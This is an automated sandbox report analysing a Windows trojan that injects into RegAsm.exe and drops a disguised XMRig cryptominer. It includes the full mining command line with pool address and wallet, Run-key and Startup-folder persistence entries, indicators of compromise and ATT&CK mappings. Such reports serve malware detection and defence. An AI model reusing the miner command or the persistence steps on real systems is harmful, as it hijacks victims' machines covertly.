Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7476 -s 764
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7632 -s 864Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6272 -s 864Jump to behavior
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: conhost.exe, 00000015.00000002.4119627710.000002845D530000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00FD90B5
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00FD8C84
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FD8E7F
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FCA871
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00FD9431
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FD902A
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00FD9606
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FD8F8F
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FD9537
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FCB32D
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: EnumSystemLocalesW,0_2_00FD8F26
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: GetLocaleInfoW,0_2_00FD9308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00F8EDF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F8EDF4
MITRE ATT&CK Matrix (a number prefixing a technique is the report's count of matched signatures for it)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 21 Registry Run Keys / Startup Folder | 412 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 21 Registry Run Keys / Startup Folder | 3 Virtualization/Sandbox Evasion | LSASS Memory | 111 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Disable or Modify Tools | Security Account Manager | 3 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph (ID: 1479411), sample: kWYLtJ0Cn1.exe, start date: 23/07/2024, architecture: WINDOWS, score: 100
DNS: pool.supportxmr.com, pool-fr.supportxmr.com
Signatures on the sample: Sigma detected: Xmrig; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 9 other signatures
• kWYLtJ0Cn1.exe started
  Signatures: Found strings related to Crypto-Mining; Contains functionality to inject code into remote processes; Writes to foreign memory regions; 2 other signatures
  • RegAsm.exe started
    Dropped: C:\Users\user\AppData\Roaming\...\Driver.exe (MS-DOS); C:\Users\user\AppData\Roaming\...\Driver.url (MS)
    • Driver.exe started (four instances; each starts conhost.exe, three of them also start WerFault.exe)
      Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Found strings related to Crypto-Mining
      Network (one connection from each of three instances): pool-fr.supportxmr.com 141.94.96.195 port 3333 (local ports 49730, 49741); 141.94.96.71 port 3333 (local ports 49738, 49739); 141.94.96.144 port 3333 (local ports 49740, 49743); all DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, Germany
      Signature on the 141.94.96.144 connection: Detected Stratum mining protocol
• svchost.exe started (two instances)
  • WerFault.exe started (two under the first svchost.exe, one under the second)

Initial Sample
Source | Detection | Scanner | Label | Link
kWYLtJ0Cn1.exe | 50% | ReversingLabs | Win32.Trojan.Fragtor |
kWYLtJ0Cn1.exe | 100% | Avira | HEUR/AGEN.1316902 |
kWYLtJ0Cn1.exe | 100% | Joe Sandbox ML | |

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | 61% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner |

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
https://xmrig.com/wizard | 0% | Avira URL Cloud | safe |
https://xmrig.com/wizard%s | 0% | Avira URL Cloud | safe |
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 141.94.96.195 | true | true | | unknown
pool.supportxmr.com | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://xmrig.com/wizard | Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
https://xmrig.com/wizard%s | Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
https://xmrig.com/docs/algorithms | Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
141.94.96.195 | pool-fr.supportxmr.com | Germany | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
141.94.96.71 | unknown | Germany | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
141.94.96.144 | unknown | Germany | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1479411
Start date and time: 2024-07-23 15:44:36 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: kWYLtJ0Cn1.exe (renamed because the original name is a hash value)
Original Sample Name: 917f9d9d484f8657efc7f60b8adde947.exe
Detection: MAL
Classification: mal100.troj.expl.evad.mine.winEXE@29/2@1/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: kWYLtJ0Cn1.exe
Time | Type | Description
09:46:07 | API Interceptor | 8071x Sleep call for process: RegAsm.exe modified
14:45:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe
14:45:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe
14:45:49 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
IP context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
141.94.96.195 | http://pool.supportxmr.com | malicious | Unknown | pool.supportxmr.com/favicon.ico
141.94.96.71 | h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig |
141.94.96.71 | http://pool.supportxmr.com | malicious | Unknown |
141.94.96.71 | http://pool.supportxmr.com | malicious | Unknown |
141.94.96.71 | 01904399.dat.exe | malicious | LoaderBot, Xmrig |
141.94.96.71 | file.exe | malicious | Xmrig |
141.94.96.71 | file.exe | malicious | Xmrig |
141.94.96.71 | KMSPicoSetup.exe | malicious | Xmrig |
141.94.96.71 | target.ps1 | malicious | Xmrig |
141.94.96.71 | file.exe | malicious | LoaderBot, Xmrig |
141.94.96.71 | file.exe | malicious | RHADAMANTHYS, Vidar, Xmrig |
141.94.96.144 | FieroHack.exe | malicious | Xmrig |
141.94.96.144 | h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig |
141.94.96.144 | curriculum_vitae-copie.vbs | malicious | Xmrig |
141.94.96.144 | curriculum_vitae-copie_(1).vbs | malicious | Xmrig |
141.94.96.144 | curriculum_vitae-copie.vbs | malicious | Xmrig |
141.94.96.144 | Vsob3IooE7.exe | malicious | Xmrig |
141.94.96.144 | GameBar.exe | malicious | Xmrig |
141.94.96.144 | FTrondtloadws.exe | malicious | Xmrig |
141.94.96.144 | file.exe | malicious | Xmrig |
141.94.96.144 | GoogleUpdate.exe | malicious | Xmrig |
Domain context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pool-fr.supportxmr.com | updater.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | xjSglbp263.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | gwRQinPOHB.exe | malicious | Xmrig | 141.94.96.195
pool-fr.supportxmr.com | FieroHack.exe | malicious | Xmrig | 141.94.96.195
pool-fr.supportxmr.com | FieroHack.exe | malicious | LummaC, Xmrig | 141.94.96.195
pool-fr.supportxmr.com | gVRqUej0ci.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig | 141.94.96.144
pool-fr.supportxmr.com | setup.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine | 141.94.96.71
pool-fr.supportxmr.com | SecuriteInfo.com.Win32.Evo-gen.18867.15916.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | http://pool.supportxmr.com | malicious | Unknown | 141.94.96.71
ASN context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Fzfee1Lgc2.elf | malicious | Unknown | 137.248.101.131
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | gUJak0onLk.elf | malicious | Unknown | 139.6.220.162
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | updater.exe | malicious | Xmrig | 141.94.96.195
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | http://nys-ns.com/ | malicious | Unknown | 141.95.124.137
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | http://nys-ns.com/ | malicious | Unknown | 141.95.124.137
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | ZPPEqPIBy7.elf | malicious | Unknown | 130.133.207.43
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | D8J2VuFPRL.rtf | malicious | FormBook | 141.95.110.31
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Pn0jlaHvxE.elf | malicious | Mirai, Gafgyt, Okiru | 141.99.20.144
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | 1gx339YsKN.elf | malicious | Mirai, Gafgyt, Okiru | 141.88.171.81
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | faBNhIKHq4.elf | malicious | Mirai, Gafgyt, Okiru | 141.89.138.130
                                                                No context
Dropped file context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | file.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | W1nnerFree CS2.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | KRZyX0PPRm.exe | malicious | Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | lO188m2RAu.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | file.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | 01904399.dat.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Vsob3IooE7.exe | malicious | Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | ruZVRNvu0Y.exe | malicious | LoaderBot, Xmrig |
C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | file.exe | malicious | LoaderBot, Xmrig |
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe>), ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):179
                                                                                    Entropy (8bit):5.310768277964914
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:HRAbABGQYm5uOt+kiEaKC5SQn3gL4NvQJ4ovsty9ty8WddSWAnPL4cHEiWXU:HRYFVmwOwknaZ5l3gL49QJlvsty9LW61
                                                                                    MD5:8A7A9D74B0F86F4C475A1369279FEA2D
                                                                                    SHA1:1599024A76325836AC23AE3BE751326FF329A66B
                                                                                    SHA-256:873E3DBA7B1463B9887E8026B4B0E105AFE5A463C0D31DC83860CFBBF9D59376
                                                                                    SHA-512:0299F49EB7BACB6C3DEC6B8AC644ED5B0C6B42658E51651329F29A2289DFFA3DD5AF3414EA7F5A247794B6AC522BF9ECFC3A29B638FB4F3ACDEFA852B0BEC3C7
                                                                                    Malicious:true
                                                                                    Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe..IconIndex=0..IconFile=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\backup (3).ico..
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4141064
Entropy (8bit):5.210440836800201
Encrypted:false
SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
MD5:02569A7A91A71133D4A1023BF32AA6F4
SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 61%
Joe Sandbox View:
• Filename: h2UFp4aCRq.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: W1nnerFree CS2.exe, Detection: malicious
• Filename: KRZyX0PPRm.exe, Detection: malicious
• Filename: lO188m2RAu.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: 01904399.dat.exe, Detection: malicious
• Filename: Vsob3IooE7.exe, Detection: malicious
• Filename: ruZVRNvu0Y.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.948526018433718
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:kWYLtJ0Cn1.exe
File size:4'819'968 bytes
MD5:917f9d9d484f8657efc7f60b8adde947
SHA1:01e4648cef9fb934429d63471127805120202ca9
SHA256:1099655a13691a6c4856fa29fa038e89805c8ff7ba6d04c6c56128728be19ff4
SHA512:6f81636f49ac851709372e04fa4b95a47da1d17bb84c0150fda6f1ee37111ac357ae17414e9d96f597ac99b2693a9b5838d43fc22b12abbed3e6bbf6421635d2
SSDEEP:98304:ybFXaexwoV2rqKxaWkidqVtIhjAgWlZHrtjFsN3RwC+cDhfXXWB:gwexwoVLhidqVtg8jZHrw3wC+8
TLSH:672623113AD18036D77324324A29E3B617AEF9310F5986EF17D85E7E2F34AC19B2161E
Icon Hash:90cececece8e8eb0
Entrypoint:0x42e1ba
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x669F79AF [Tue Jul 23 09:36:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:af0f88358390a4f58963b26bacea4505
Instruction
call 00007FEDC0D945A7h
jmp 00007FEDC0D93748h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FEDC0D93153h
jmp 00007FEDC0D93902h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007FEDC0D93144h
jmp 00007FEDC0D938F3h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0049C100h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0049C100h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0049C100h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9aa98 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x498000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x499000 | 0x50e4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x931b0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x932c0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x930f0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x89000 | 0x218 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x870f6 | 0x87200 | ea2552f81ceccf649a83b4b70470fd03 | False | 0.4206500057816836 | data | 6.662104007323327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x89000 | 0x12774 | 0x12800 | 8589e608da1f6a3153f2c50536c2bfbf | False | 0.3732712204391892 | data | 4.729413980411144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9c000 | 0x3fb1f8 | 0x3f9a00 | d6b749cff934fb227069b52f0b853fbc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x498000 | 0x1e0 | 0x200 | 163e56f8d734ee3f87ce78c26893fd50 | False | 0.52734375 | data | 4.7059600829467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x499000 | 0x50e4 | 0x5200 | 096ca5203311410b029f61ecbe9c0afa | False | 0.7240377286585366 | data | 6.620919772930253 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x498060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
USER32.dll | OffsetRect
KERNEL32.dll | GetCPInfo, CreateFileW, WaitForSingleObject, GetModuleHandleA, SwitchToFiber, CreateThread, GetProcAddress, VirtualAllocEx, RaiseException, RtlCaptureStackBackTrace, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, FormatMessageA, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, CloseHandle, WaitForSingleObjectEx, Sleep, SwitchToThread, GetExitCodeThread, GetNativeSystemInfo, QueryPerformanceCounter, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LocalFree, GetLocaleInfoEx, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, SetFileInformationByHandle, GetTempPathW, InitOnceExecuteOnce, CreateEventExW, CreateSemaphoreExW, FlushProcessWriteBuffers, GetCurrentProcessorNumber, GetSystemTimeAsFileTime, GetTickCount64, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForThreadpoolTimerCallbacks, CloseThreadpoolTimer, CreateThreadpoolWait, SetThreadpoolWait, CloseThreadpoolWait, GetModuleHandleW, GetFileInformationByHandleEx, CreateSymbolicLinkW, GetStringTypeW, CompareStringEx, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, HeapSize, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, ExitProcess, GetModuleFileNameW, GetStdHandle, WriteFile, SetConsoleCtrlHandler, HeapAlloc, HeapFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetCurrentThread, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, OutputDebugStringW, SetStdHandle
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-23T15:48:56.694363+0200 | TCP | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 49738 | 3333 | 192.168.2.4 | 141.94.96.71
2024-07-23T15:45:21.326757+0200 | TCP | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 49743 | 3333 | 192.168.2.4 | 141.94.96.144
2024-07-23T15:45:36.297076+0200 | UDP | 2047928 | ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 51744 | 53 | 192.168.2.4 | 1.1.1.1
2024-07-23T15:47:54.453933+0200 | TCP | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 49730 | 3333 | 192.168.2.4 | 141.94.96.195
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Jul 23, 2024 15:48:29.721797943 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:40.719981909 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:40.826919079 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:51.101943970 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:51.217513084 CEST497383333192.168.2.4141.94.96.71
